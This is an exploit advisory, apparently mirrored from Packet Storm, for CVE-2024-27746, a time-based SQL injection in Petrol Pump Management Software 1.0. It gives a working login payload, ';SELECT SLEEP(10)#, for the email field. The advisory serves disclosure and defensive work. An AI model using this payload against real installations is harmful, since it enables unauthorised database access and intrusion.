Petrol Pump Management Software 1.0 SQL Injection
2024-3-5 00:20:7 Author: packetstormsecurity.com(查看原文) 阅读量:6 收藏

# Exploit Title: SQL Injection vulnerability in Petrol Pump Management
Software v.1.0.
# Date: 01-03-2024
# Exploit Author: Shubham Pandey
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:
https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
# Version: 1.0
# Tested on: Windows, Linux
# CVE : CVE-2024-27746
# Description: SQL Injection vulnerability in Petrol Pump Management
Software v.1.0 allows an attacker to execute arbitrary code via a crafted
payload to the email address parameter in the index.php component.
# POC:
1. Here we go to : http://localhost/fuelflow/index.php
2. Now login with username: [email protected]';SELECT SLEEP(10)# and
Password=test
3. Page will load for 10 seconds because of time-based sql injection
# Reference:
https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27746.md
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27746

文章来源: https://packetstormsecurity.com/files/177406/ppms10-sql.txt
如有侵权请联系:admin#unsafe.sh